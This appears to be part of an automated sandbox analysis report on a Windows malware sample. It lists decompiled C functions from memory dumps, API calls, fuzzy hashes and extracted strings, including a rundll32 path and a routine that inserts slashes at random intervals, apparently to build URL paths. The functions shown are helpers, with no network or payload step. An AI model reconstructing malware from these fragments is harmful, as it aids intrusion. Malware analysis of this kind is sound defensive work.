                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4e87e354ae26941ff2c2f7d55b02eb5145f65f8da3988ec43fec8267beec2f2d
                  • Instruction ID: 8d23c3cffb3c9b128b9d6bd27dc6086191cf90ca2e7bf03468314513d7543438
                  • Opcode Fuzzy Hash: 4e87e354ae26941ff2c2f7d55b02eb5145f65f8da3988ec43fec8267beec2f2d
                  • Instruction Fuzzy Hash: 71212BB3A21211ABCB124F259D4CB0E376D9F05774F210115EE4BB7290EA30EC21F9D8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			E00DC4E6B(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                  				intOrPtr _v8;
                  				void* _v12;
                  				void* _v16;
                  				intOrPtr _t26;
                  				intOrPtr* _t28;
                  				intOrPtr _t31;
                  				intOrPtr* _t32;
                  				void* _t39;
                  				int _t46;
                  				intOrPtr* _t47;
                  				int _t48;
                  
                  				_t47 = __eax;
                  				_push( &_v12);
                  				_push(__eax);
                  				_t39 = 0;
                  				_t46 = 0;
                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                  				_v8 = _t26;
                  				if(_t26 < 0) {
                  					L13:
                  					return _v8;
                  				}
                  				if(_v12 == 0) {
                  					Sleep(0xc8);
                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                  				}
                  				if(_v8 >= _t39) {
                  					_t28 = _v12;
                  					if(_t28 != 0) {
                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                  						_v8 = _t31;
                  						if(_t31 >= 0) {
                  							_t46 = lstrlenW(_v16);
                  							if(_t46 != 0) {
                  								_t46 = _t46 + 1;
                  								_t48 = _t46 + _t46;
                  								_t39 = E00DC75C4(_t48);
                  								if(_t39 == 0) {
                  									_v8 = 0x8007000e;
                  								} else {
                  									memcpy(_t39, _v16, _t48);
                  								}
                  								__imp__#6(_v16);
                  							}
                  						}
                  						_t32 = _v12;
                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                  					}
                  					 *_a4 = _t39;
                  					 *_a8 = _t46 + _t46;
                  				}
                  				goto L13;
                  			}















                  APIs
                  • Sleep.KERNEL32(000000C8), ref: 00DC4E99
                  • lstrlenW.KERNEL32(?), ref: 00DC4ECF
                  • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00DC4EF0
                  • SysFreeString.OLEAUT32(?), ref: 00DC4F04
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: FreeSleepStringlstrlenmemcpy
                  • String ID:
                  • API String ID: 1198164300-0
                  • Opcode ID: 496b5c2fb3a56d63fb0375e9783de568d1d9ddd93da92f8552f5efa594ed1f14
                  • Instruction ID: a63af06c2f9a7a375e37f8e36df35b4dd5778de11658ed965a8e0a7568d0c2bd
                  • Opcode Fuzzy Hash: 496b5c2fb3a56d63fb0375e9783de568d1d9ddd93da92f8552f5efa594ed1f14
                  • Instruction Fuzzy Hash: D7213C75A0120AEFCB11DFA8D894E9EBBB8FF48305B1441ADF906E7210E770DA41DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                  • _free.LIBCMT ref: 7029D13A
                  • _free.LIBCMT ref: 7029D170
                  • SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorLast_free
                  • String ID:
                  • API String ID: 2283115069-0
                  • Opcode ID: a8f43cb11a6e0f97ceca65ad5a14faf0ee1086b9a2c3be480f6842f721639141
                  • Instruction ID: 8531971deecfb427f9c78cce94e951937445c2389118a4ea837d33fca1ec6e12
                  • Opcode Fuzzy Hash: a8f43cb11a6e0f97ceca65ad5a14faf0ee1086b9a2c3be480f6842f721639141
                  • Instruction Fuzzy Hash: 7C1170732601056EE7026A759C8DF1F366EABC1675B750228F62AB61B0EE219C31791C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLastError.KERNEL32(?,?,00000000,7029F5DF,7029C6F5,?,?,7029A4F1), ref: 7029D234
                  • _free.LIBCMT ref: 7029D291
                  • _free.LIBCMT ref: 7029D2C7
                  • SetLastError.KERNEL32(00000000,702C0050,000000FF,?,00000000,7029F5DF,7029C6F5,?,?,7029A4F1), ref: 7029D2D2
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorLast_free
                  • String ID:
                  • API String ID: 2283115069-0
                  • Opcode ID: eb55f8ba9c813a2558ccdd228d90adeb9b609659fa1b015b49d15aef38f9f04d
                  • Instruction ID: 42e12a3ab9f0de2d7e8baf99fd1bceddf3cd24b0233d69d0d8f22c07e4603405
                  • Opcode Fuzzy Hash: eb55f8ba9c813a2558ccdd228d90adeb9b609659fa1b015b49d15aef38f9f04d
                  • Instruction Fuzzy Hash: 4F1170736642056EE7021B7A9C8DF1F336EABC1674B310228FA16F61A1DE61DC35B91C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,7029748F,00000000,?,00000001,?,?,70297506,00000001,702ADC94,702ADC8C,702ADC94), ref: 7029745E
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 894d978ba67ca95f4227c76961660d01c29f50faef51ef390b82f6cd507095c8
                  • Instruction ID: 6d89114de02c3cf4379144afe50d67b06947b33efb761dada27de8bbde6f2da9
                  • Opcode Fuzzy Hash: 894d978ba67ca95f4227c76961660d01c29f50faef51ef390b82f6cd507095c8
                  • Instruction Fuzzy Hash: 1511A773A61222ABDB12DF698C4474D77F99F01760F211160EE16F7281D770ED10AAD9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E00DC71BA(unsigned int __eax, void* __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				signed int _t21;
                  				signed short _t23;
                  				char* _t27;
                  				void* _t29;
                  				void* _t30;
                  				unsigned int _t33;
                  				void* _t37;
                  				unsigned int _t38;
                  				void* _t41;
                  				void* _t42;
                  				int _t45;
                  				void* _t46;
                  
                  				_t42 = __eax;
                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                  				_t38 = __eax;
                  				_t30 = RtlAllocateHeap( *0xdcd1f0, 0, (__eax >> 3) + __eax + 1);
                  				_v12 = _t30;
                  				if(_t30 != 0) {
                  					_v8 = _t42;
                  					do {
                  						_t33 = 0x18;
                  						if(_t38 <= _t33) {
                  							_t33 = _t38;
                  						}
                  						_t21 =  *0xdcd208; // 0x0
                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                  						 *0xdcd208 = _t23;
                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                  						memcpy(_t30, _v8, _t45);
                  						_v8 = _v8 + _t45;
                  						_t27 = _t30 + _t45;
                  						_t38 = _t38 - _t45;
                  						_t46 = _t46 + 0xc;
                  						 *_t27 = 0x2f;
                  						_t13 = _t27 + 1; // 0x1
                  						_t30 = _t13;
                  					} while (_t38 > 8);
                  					memcpy(_t30, _v8, _t38 + 1);
                  				}
                  				return _v12;
                  			}


















                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DC14A0,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC71C5
                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00DC71DD
                  • memcpy.NTDLL(00000000,05119630,-00000008,?,?,?,00DC14A0,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC7221
                  • memcpy.NTDLL(00000001,05119630,00000001,00DC6C79,00000000,05119630), ref: 00DC7242
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: memcpy$AllocateHeaplstrlen
                  • String ID:
                  • API String ID: 1819133394-0
                  • Opcode ID: a335a0d79b6d6fb96169d32147adf44378fab978b2e1e0d2622b6a05e8bb2040
                  • Instruction ID: 0b7ad0a2432cd7afc7ab480024282e1cf3c201d4ad1b7e5056157475240f636a
                  • Opcode Fuzzy Hash: a335a0d79b6d6fb96169d32147adf44378fab978b2e1e0d2622b6a05e8bb2040
                  • Instruction Fuzzy Hash: E6112972A00317AFC7108B69DC88F9EFBBEEB85350B08027AF505D7250EA709E0087B0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00DC752B(char* __eax) {
                  				char* _t8;
                  				intOrPtr _t12;
                  				char* _t21;
                  				signed int _t23;
                  				char* _t24;
                  				signed int _t26;
                  				void* _t27;
                  
                  				_t21 = __eax;
                  				_push(0x20);
                  				_t23 = 1;
                  				_push(__eax);
                  				while(1) {
                  					_t8 = StrChrA();
                  					if(_t8 == 0) {
                  						break;
                  					}
                  					_t23 = _t23 + 1;
                  					_push(0x20);
                  					_push( &(_t8[1]));
                  				}
                  				_t12 = E00DC75C4(_t23 << 2);
                  				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                  				if(_t12 != 0) {
                  					StrTrimA(_t21, 0xdcc2bc);
                  					_t26 = 0;
                  					do {
                  						_t24 = StrChrA(_t21, 0x20);
                  						if(_t24 != 0) {
                  							 *_t24 = 0;
                  							_t24 =  &(_t24[1]);
                  							StrTrimA(_t24, 0xdcc2bc);
                  						}
                  						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                  						_t26 = _t26 + 1;
                  						_t21 = _t24;
                  					} while (_t24 != 0);
                  					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                  				}
                  				return 0;
                  			}











                  APIs
                  • StrChrA.SHLWAPI(?,00000020,00000000,0511962C,?,?,?,00DC5B5B,0511962C,?,?,00DC79CC), ref: 00DC7545
                  • StrTrimA.SHLWAPI(?,00DCC2BC,00000002,?,?,?,00DC5B5B,0511962C,?,?,00DC79CC), ref: 00DC7564
                  • StrChrA.SHLWAPI(?,00000020,?,?,?,00DC5B5B,0511962C,?,?,00DC79CC,?,?,?,?,?,00DC87DD), ref: 00DC756F
                  • StrTrimA.SHLWAPI(00000001,00DCC2BC,?,?,?,00DC5B5B,0511962C,?,?,00DC79CC,?,?,?,?,?,00DC87DD), ref: 00DC7581
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Trim
                  • String ID:
                  • API String ID: 3043112668-0
                  • Opcode ID: bb8047149b6d66f6ba1bd8e94e501a5716ba93e33480b31911906cfb2f1c5cb9
                  • Instruction ID: 240422e442d95911dc86e8820d9e5c8dccadc5f4f08aadcf730f00da64ffd6fe
                  • Opcode Fuzzy Hash: bb8047149b6d66f6ba1bd8e94e501a5716ba93e33480b31911906cfb2f1c5cb9
                  • Instruction Fuzzy Hash: 9601D8716193135FC2219F698C48F2BBE98FB85BA0F25051DF985C7381EB60CC019AF4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00DC4200(intOrPtr _a4, intOrPtr _a8) {
                  				char _v20;
                  				void* _t8;
                  				void* _t13;
                  				void* _t16;
                  				char* _t18;
                  				void* _t19;
                  
                  				_t19 = 0x27;
                  				_t1 =  &_v20; // 0x74666f53
                  				_t18 = 0;
                  				E00DC5B70(_t8, _t1);
                  				_t16 = E00DC75C4(_t19);
                  				if(_t16 != 0) {
                  					_t3 =  &_v20; // 0x74666f53
                  					_t13 = E00DC39B5(_t3, _t16, _a8);
                  					if(_a4 != 0) {
                  						__imp__(_a4);
                  						_t19 = _t13 + 0x27;
                  					}
                  					_t18 = E00DC75C4(_t19);
                  					if(_t18 != 0) {
                  						 *_t18 = 0;
                  						if(_a4 != 0) {
                  							__imp__(_t18, _a4);
                  						}
                  						__imp__(_t18, _t16);
                  					}
                  					E00DC4C31(_t16);
                  				}
                  				return _t18;
                  			}










                  APIs
                    • Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0
                    • Part of subcall function 00DC39B5: wsprintfA.USER32 ref: 00DC3A11
                  • lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,7742C740,00DC70CE,74666F53,00000000,?,00000000,?,?,00DC79D7), ref: 00DC4236
                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00DC425A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00DC4262
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                  • String ID: Soft
                  • API String ID: 393707159-3753413193
                  • Opcode ID: b441adf60438f78d54a89e70627252c821c9d9fd8169a9853c0503bee45a7945
                  • Instruction ID: b49b3d4f39966b9ebcccf4423790f0fe3fc434b75530fb1e8a5a5199ed72257a
                  • Opcode Fuzzy Hash: b441adf60438f78d54a89e70627252c821c9d9fd8169a9853c0503bee45a7945
                  • Instruction Fuzzy Hash: 1701A23210021BA7CB126BA49C95FEE7A79EF85355F044029F90997101DB74C945DBB5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E00DC5B10(void** __esi) {
                  				char* _v0;
                  				intOrPtr _t4;
                  				intOrPtr _t6;
                  				void* _t8;
                  				intOrPtr _t11;
                  				void* _t12;
                  				void** _t14;
                  
                  				_t14 = __esi;
                  				_t4 =  *0xdcd2dc; // 0x5119630
                  				__imp__(_t4 + 0x40);
                  				while(1) {
                  					_t6 =  *0xdcd2dc; // 0x5119630
                  					_t1 = _t6 + 0x58; // 0x0
                  					if( *_t1 == 0) {
                  						break;
                  					}
                  					Sleep(0xa);
                  				}
                  				_t8 =  *_t14;
                  				if(_t8 != 0 && _t8 != 0xdcd030) {
                  					HeapFree( *0xdcd1f0, 0, _t8);
                  				}
                  				_t14[1] = E00DC752B(_v0, _t14);
                  				_t11 =  *0xdcd2dc; // 0x5119630
                  				_t12 = _t11 + 0x40;
                  				__imp__(_t12);
                  				return _t12;
                  			}











                  APIs
                  • RtlEnterCriticalSection.NTDLL(051195F0), ref: 00DC5B19
                  • Sleep.KERNEL32(0000000A,?,?,00DC79CC,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC5B23
                  • HeapFree.KERNEL32(00000000,00000000,?,?,00DC79CC,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC5B4B
                  • RtlLeaveCriticalSection.NTDLL(051195F0), ref: 00DC5B67
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                  • String ID:
                  • API String ID: 58946197-0
                  • Opcode ID: 5844a40b404768d260a33697bf821742fdcdf596e79e306873e89a4faf600d4e
                  • Instruction ID: 1115b293c1b2ea26e7f78457bbb6d54802b339dd7f1cff449c189de04d23bc43
                  • Opcode Fuzzy Hash: 5844a40b404768d260a33697bf821742fdcdf596e79e306873e89a4faf600d4e
                  • Instruction Fuzzy Hash: 70F05E70222743DFD7249F68EC49F057BA6AB14340F084418F64AC7360C630EC41EB34
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00DC310C() {
                  				void* _t1;
                  				intOrPtr _t5;
                  				void* _t6;
                  				void* _t7;
                  				void* _t11;
                  
                  				_t1 =  *0xdcd224; // 0x328
                  				if(_t1 == 0) {
                  					L8:
                  					return 0;
                  				}
                  				SetEvent(_t1);
                  				_t11 = 0x7fffffff;
                  				while(1) {
                  					SleepEx(0x64, 1);
                  					_t5 =  *0xdcd264; // 0x0
                  					if(_t5 == 0) {
                  						break;
                  					}
                  					_t11 = _t11 - 0x64;
                  					if(_t11 > 0) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_t6 =  *0xdcd224; // 0x328
                  				if(_t6 != 0) {
                  					CloseHandle(_t6);
                  				}
                  				_t7 =  *0xdcd1f0; // 0x4d20000
                  				if(_t7 != 0) {
                  					HeapDestroy(_t7);
                  				}
                  				goto L8;
                  			}









                  APIs
                  • SetEvent.KERNEL32(00000328,00000001,00DCA615), ref: 00DC3117
                  • SleepEx.KERNEL32(00000064,00000001), ref: 00DC3126
                  • CloseHandle.KERNEL32(00000328), ref: 00DC3147
                  • HeapDestroy.KERNEL32(04D20000), ref: 00DC3157
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: CloseDestroyEventHandleHeapSleep
                  • String ID:
                  • API String ID: 4109453060-0
                  • Opcode ID: 3895220531629052a63e6a2cda59f3790baac9375e3daab942f531ec06d4ddb8
                  • Instruction ID: ac218451577f7c972a66d84b275889fed3d821a6e9e14a033dbff87d5427a1ac
                  • Opcode Fuzzy Hash: 3895220531629052a63e6a2cda59f3790baac9375e3daab942f531ec06d4ddb8
                  • Instruction Fuzzy Hash: BDF03071714313DFDB209B74AD08F06779DAB14BA1B0C4128FA09D33A4CA20C9019674
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,702A97F7,00000000,00000001,00000000,00000000,?,702A5D0B,00000000,00000020,00000000), ref: 702A9E64
                  • GetLastError.KERNEL32(?,702A97F7,00000000,00000001,00000000,00000000,?,702A5D0B,00000000,00000020,00000000,00000000,00000000,?,702A625F,00000000), ref: 702A9E70
                    • Part of subcall function 702A9E36: CloseHandle.KERNEL32(702C08A0,702A9E80,?,702A97F7,00000000,00000001,00000000,00000000,?,702A5D0B,00000000,00000020,00000000,00000000,00000000), ref: 702A9E46
                  • ___initconout.LIBCMT ref: 702A9E80
                    • Part of subcall function 702A9DF8: CreateFileW.KERNEL32(702B3128,40000000,00000003,00000000,00000003,00000000,00000000,702A9E27,702A97E4,00000000,?,702A5D0B,00000000,00000020,00000000,00000000), ref: 702A9E0B
                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,702A97F7,00000000,00000001,00000000,00000000,?,702A5D0B,00000000,00000020,00000000,00000000), ref: 702A9E95
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                  • String ID:
                  • API String ID: 2744216297-0
                  • Opcode ID: 332b57c3e3bdb6642612a6d165a36e3a27de495bfb4b25c3cb98276ed8c8dfce
                  • Instruction ID: b1a3587b053a535e1ffd6582d65fc01e6330efb70fd29e9c60c7ec343ff37ae1
                  • Opcode Fuzzy Hash: 332b57c3e3bdb6642612a6d165a36e3a27de495bfb4b25c3cb98276ed8c8dfce
                  • Instruction Fuzzy Hash: 1EF09E77541115BFCB225F97CC09A8E7E66EB04761F254511FE1995120CA319860EB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00DC10E4() {
                  				void* _v0;
                  				void** _t3;
                  				void** _t5;
                  				void** _t7;
                  				void** _t8;
                  				void* _t10;
                  
                  				_t3 =  *0xdcd2dc; // 0x5119630
                  				__imp__( &(_t3[0x10]));
                  				while(1) {
                  					_t5 =  *0xdcd2dc; // 0x5119630
                  					_t1 =  &(_t5[0x16]); // 0x0
                  					if( *_t1 == 0) {
                  						break;
                  					}
                  					Sleep(0xa);
                  				}
                  				_t7 =  *0xdcd2dc; // 0x5119630
                  				_t10 =  *_t7;
                  				if(_t10 != 0 && _t10 != 0xdce882) {
                  					HeapFree( *0xdcd1f0, 0, _t10);
                  					_t7 =  *0xdcd2dc; // 0x5119630
                  				}
                  				 *_t7 = _v0;
                  				_t8 =  &(_t7[0x10]);
                  				__imp__(_t8);
                  				return _t8;
                  			}










                  APIs
                  • RtlEnterCriticalSection.NTDLL(051195F0), ref: 00DC10ED
                  • Sleep.KERNEL32(0000000A,?,?,00DC79CC,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC10F7
                  • HeapFree.KERNEL32(00000000,?,?,?,00DC79CC,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC1125
                  • RtlLeaveCriticalSection.NTDLL(051195F0), ref: 00DC113A
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                  • String ID:
                  • API String ID: 58946197-0
                  • Opcode ID: 056f6ea576c8d7613a504988f3f6e3e335215bc08c9ba9a6581ca3b68007a86c
                  • Instruction ID: f879b33f0134389e591f246b3a70de81ad7b50ca28ccf38071fa4db470bd0622
                  • Opcode Fuzzy Hash: 056f6ea576c8d7613a504988f3f6e3e335215bc08c9ba9a6581ca3b68007a86c
                  • Instruction Fuzzy Hash: 6DF0D4B8222783DFE7188B25DC49F16B7A5AB49340F084028FA06C7361CA34EC01EB38
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleExW.KERNEL32(00000006,702B3DA0,?,?,?,?,?,?,?,?,?,?,?,702B3DA0,702910AD), ref: 70299055
                  • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,702B3DA0,702910AD), ref: 70299079
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: Module$FileHandleName
                  • String ID: \
                  • API String ID: 4146042529-2967466578
                  • Opcode ID: 2fb0cab3dc39b85a61926c32d75950bdf5e9b668bfeeadcd6836d19e4e1b31e3
                  • Instruction ID: 23367d7d3f8d5fc305c559fe5646748f658af0f2c45f40463c44d4c9570acc73
                  • Opcode Fuzzy Hash: 2fb0cab3dc39b85a61926c32d75950bdf5e9b668bfeeadcd6836d19e4e1b31e3
                  • Instruction Fuzzy Hash: F3C1D4B3A2010A6AD7525F299C49FDF727DAF85314F240168FC0AF6104F7309A66CEA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID: C:\Windows\SysWOW64\rundll32.exe
                  • API String ID: 0-2837366778
                  • Opcode ID: 0b9ebaad31367b67bffcfa1269f85cf18e040e3732b2a44162da137f5ccb3589
                  • Instruction ID: 2c9d857b3794aaa320752c8e6079ddd77e9c83904727717174070afcbeb50a4e
                  • Opcode Fuzzy Hash: 0b9ebaad31367b67bffcfa1269f85cf18e040e3732b2a44162da137f5ccb3589
                  • Instruction Fuzzy Hash: AB416473A20215AFDB129F9DC881F9EBBBDEB85310F20406AF415F7250D6709A60DB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 702960FF
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 702961B3
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: CurrentImageNonwritable___except_validate_context_record
                  • String ID: csm
                  • API String ID: 3480331319-1018135373
                  • Opcode ID: 215ee84c68b5d4631635bc45f0ce225f11fd74d4bb42a3b9ce3cd7a4703ae2b2
                  • Instruction ID: 9b36a88d91dd880d67e69cdcfe0556302509b4863c5f700cb3c525099013bc38
                  • Opcode Fuzzy Hash: 215ee84c68b5d4631635bc45f0ce225f11fd74d4bb42a3b9ce3cd7a4703ae2b2
                  • Instruction Fuzzy Hash: 84415476A102199FCB00DF68CC88B9E7BF5AF45314F108159EC1A6B352D731E925CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 702A0DE9: GetOEMCP.KERNEL32(00000000,702A105B,702C0004,00000000,7029C932,7029C932,00000000,00000000,702C0004), ref: 702A0E14
                  • _free.LIBCMT ref: 702A10B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free
                  • String ID: IS
                  • API String ID: 269201875-349531120
                  • Opcode ID: cb897b8e25b38afbaf20cac30b9c1bd13552f0e0c7177130dafe7264d713d93b
                  • Instruction ID: d2d19d08471cb9e7aeba2688c54013d03fd5d44596223701cc10c12be2f09354
                  • Opcode Fuzzy Hash: cb897b8e25b38afbaf20cac30b9c1bd13552f0e0c7177130dafe7264d713d93b
                  • Instruction Fuzzy Hash: 673182B35042899FDB01CF69C881B8E7BB5AF45320F11415AED15A72A0EF71ED60CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RaiseException.KERNEL32(E06D7363,00000001,00000003,CB)p,?,702AC9C5,?,70294243,?,702BECC4), ref: 70296073
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID: CB)p$CB)p
                  • API String ID: 3997070919-3776206364
                  • Opcode ID: 99fa81dbf4eae32ab76ea8e16a157156cc255d151618bfe31b80aaeff7b4713d
                  • Instruction ID: e9888d5c0ad010cdacde6ab930e63b608ecb999ca75cdb140491658033c4f858
                  • Opcode Fuzzy Hash: 99fa81dbf4eae32ab76ea8e16a157156cc255d151618bfe31b80aaeff7b4713d
                  • Instruction Fuzzy Hash: 0801AD77A00209AFD7019F69D884BAEBBF8FF48704F11405AED16AB391DB70AD11CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E00DC46EF(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                  				intOrPtr* _v8;
                  				void* _t17;
                  				intOrPtr* _t22;
                  				void* _t27;
                  				char* _t30;
                  				void* _t33;
                  				void* _t34;
                  				void* _t36;
                  				void* _t37;
                  				void* _t39;
                  				int _t42;
                  
                  				_t17 = __eax;
                  				_t37 = 0;
                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                  				_t2 = _t17 + 1; // 0x1
                  				_t28 = _t2;
                  				_t34 = E00DC75C4(_t2);
                  				if(_t34 != 0) {
                  					_t30 = E00DC75C4(_t28);
                  					if(_t30 == 0) {
                  						E00DC4C31(_t34);
                  					} else {
